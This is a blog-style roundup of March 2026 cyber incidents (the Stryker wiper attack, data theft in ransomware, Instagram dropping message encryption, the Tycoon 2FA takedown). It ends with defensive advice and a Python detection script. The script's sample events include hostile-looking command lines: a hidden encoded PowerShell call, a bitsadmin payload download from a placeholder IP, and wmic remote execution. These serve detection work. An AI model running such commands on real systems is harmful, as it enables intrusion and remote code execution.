March 2026: The Silent Breach.
The cybersecurity world, ever a landscape of shadows and sudden revelations, offered up a particularly potent brew of incidents this past March. Tony Anscombe, ESET’s Chief Security Evangelist, gave us his rundown, and frankly, it paints a picture far grimmer than corporate press releases usually allow. It’s not just about the ‘what’ anymore; it’s the increasingly sophisticated ‘how’ and the chilling ‘why’ that demands our attention.
Medtech Under Siege
Let’s start with Stryker. A medtech giant, a sector whose security failures can have immediate, tangible consequences for patient care, fell victim to a brazen cyberattack. The Iran-linked Handala hacktivist group claimed responsibility, and the reported damage is staggering: over 200,000 systems, servers, and mobile devices wiped clean, along with a staggering 50 terabytes of data exfiltrated. This isn’t just a financial hit; it’s a potential cascade of operational paralysis and a severe blow to patient trust. The sheer scale suggests a sophisticated operation, not a casual smash-and-grab, targeting critical infrastructure with chilling precision.
Data Theft: The New Ransomware Staple
But the Stryker incident is just one symptom of a much larger, more insidious trend. Google’s Threat Intelligence Group dropped a bombshell: suspected data theft was present in a whopping 77% of ransomware attacks in 2025. That’s a massive jump from the previous year’s 57%. This isn’t about locking files and demanding a ransom anymore; it’s about stealing your most sensitive information before encrypting your systems, creating a double bind and vastly increasing the leverage attackers hold over their victims.
And here’s where it gets architectural: attackers are increasingly relying on built-in Windows utilities. Think PowerShell, WMI, bitsadmin – these are the tools administrators use every day to manage their networks. Attackers are learning to weaponize them, blending in with legitimate traffic and evading traditional signature-based defenses. This shift forces a re-evaluation of our defensive postures; it’s no longer enough to just block known malware. We need to detect anomalous behavior, scrutinize process execution, and understand the subtle ways legitimate tools can be subverted.
Instagram’s Encryption Reversal
Then there’s Instagram. Starting in May, they’re opting to stop encrypting private messages between users. Yes, you read that right. In an era where data privacy is becoming a non-negotiable demand from consumers, a major social media platform is choosing to weaken its own security posture. The ‘why’ here is murky, shrouded in the usual corporate vagueness about ‘user experience improvements’ and ‘content moderation.’ But let’s be clear: unencrypted messages are essentially plaintext, vulnerable to any party that can intercept them—be it malicious actors, or perhaps, even more unsettlingly, the platform itself for its own data mining purposes. This move is a significant step backward for digital communication security and sets a dangerous precedent. It begs the question: if a platform designed for communication can make such a regressive choice, what does that say about their underlying commitment to user safety?
Phishing Takedown
On a more positive note, a significant blow was dealt to the phishing ecosystem. A Europol-led operation dismantled the Tycoon 2FA phishing platform. This wasn’t a minor player; it was responsible for a colossal 62% of all phishing attempts blocked by Microsoft up to mid-2025. This platform specialized in tricking users into providing two-factor authentication (2FA) codes, a seemingly strong layer of security that, when compromised, becomes a direct conduit into accounts. The takedown highlights the ongoing international cooperation necessary to combat cybercrime, but it’s also a stark reminder of how sophisticated phishing has become. Attackers aren’t just sending generic emails; they’re building elaborate platforms designed to bypass increasingly sophisticated defenses, and this specific operation targeted one of the most pernicious attack vectors: the compromise of our supposed second line of defense.
The Underlying Architecture of Attack
What’s the common thread weaving through these disparate events? It’s an architectural shift in how attackers operate. They are moving beyond brute-force methods to exploit subtle vulnerabilities in systems and human psychology. They’re weaponizing legitimate tools, leveraging data exfiltration as a primary tactic, and targeting fundamental security assumptions like encryption and 2FA.
My unique insight here? We’re witnessing the commoditization of advanced persistent threats. What was once the domain of nation-state actors—sophisticated data exfiltration, custom toolkits leveraging built-in OS functions—is now accessible to a broader range of actors, from organized cybercrime groups to ideologically motivated hacktivists. This democratization of advanced attack techniques means the threat landscape isn’t just growing; it’s evolving at an accelerating pace, demanding a commensurate evolution in our defensive strategies. We need to move beyond perimeter defense and reactive patching, focusing instead on inherent security by design, continuous monitoring, and a deep understanding of potential attack paths within our own infrastructure.
What Businesses Should Be Doing
The lessons from March 2026 are clear:
1. Assume Breach, Prepare for Data Theft: Ransomware is no longer just about downtime. It’s about data exposure. Implement strong data loss prevention (DLP) strategies and ensure you can detect data exfiltration attempts.
2. Mind Your Own Tools: Audit the usage of administrative tools within your network. Look for anomalies, unauthorized execution, and unusual access patterns.
3. Prioritize End-to-End Encryption: Advocate for and implement strong encryption wherever possible, especially for sensitive communications. Question platforms that inexplicably weaken these protections.
4. Fortify 2FA, But Don’t Rely Solely On It: While crucial, 2FA can be bypassed. Implement additional behavioral analysis and anomaly detection to catch compromised credentials and tokens.
5. Stay Informed, Stay Vigilant: The threat landscape is a moving target. Continuous threat intelligence gathering and regular security posture assessments are not optional; they’re existential.
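The kind of check that point 2 and the earlier discussion of PowerShell, WMI and bitsadmin call for, as an added example that is not from ESET’s report or the original post: a small rule set that flags legitimate Windows tools only when they run in a suspicious context, run over constructed Sysmon-style process-creation events. Hostnames, command lines, field names and rule names are all invented for illustration.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation events in a Sysmon-like shape (hypothetical data, not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -Command Get-Service"},
    {"host": "ws02", "parent": "winword.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAo..."},
    {"host": "srv03", "parent": "cmd.exe", "image": "bitsadmin.exe",
     "cmd": "bitsadmin /transfer upd /download http://203.0.113.5/u.bin C:\\Users\\Public\\u.bin"},
    {"host": "srv03", "parent": "services.exe", "image": "svchost.exe",
     "cmd": "svchost.exe -k netsvcs"},
    {"host": "ws04", "parent": "cmd.exe", "image": "wmic.exe",
     "cmd": "wmic /node:ws05 process call create \"cmd.exe /c whoami\""},
]

# Each rule: name, image it applies to, regex over the command line, optional parent regex.
# The point is "legitimate tool, suspicious context", not "block the tool".
RULES: List[Tuple[str, str, str, str]] = [
    ("powershell_encoded_command", "powershell.exe", r"(?i)\s-(e|enc|encodedcommand)\s", ""),
    ("powershell_from_office_parent", "powershell.exe", r".*", r"(?i)^(winword|excel|powerpnt|outlook)\.exe$"),
    ("bitsadmin_download_from_url", "bitsadmin.exe", r"(?i)/transfer.*https?://", ""),
    ("wmic_remote_process_create", "wmic.exe", r"(?i)/node:.*process\s+call\s+create", ""),
]


def match_event(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event trips (empty list means it looks routine)."""
    hits = []
    for name, image, cmd_re, parent_re in RULES:
        if event["image"].lower() != image or not re.search(cmd_re, event["cmd"]):
            continue
        if parent_re and not re.search(parent_re, event["parent"]):
            continue
        hits.append(name)
    return hits


def triage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map host -> sorted unique rule names, so a host tripping several rules stands out."""
    findings: Dict[str, List[str]] = {}
    for ev in events:
        for name in match_event(ev):
            if name not in findings.setdefault(ev["host"], []):
                findings[ev["host"]].append(name)
    return {h: sorted(v) for h, v in findings.items()}


if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(rules)}")
```

The routine PowerShell call on ws01 and the normal svchost start on srv03 produce no findings; the signal comes from the parent process, the encoded argument and the network path, which is what signature-only controls miss.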
The fight for cybersecurity is a constant, often thankless, battle. March 2026 just provided another stark reminder of the stakes involved and the relentless ingenuity of those who seek to exploit our digital dependencies.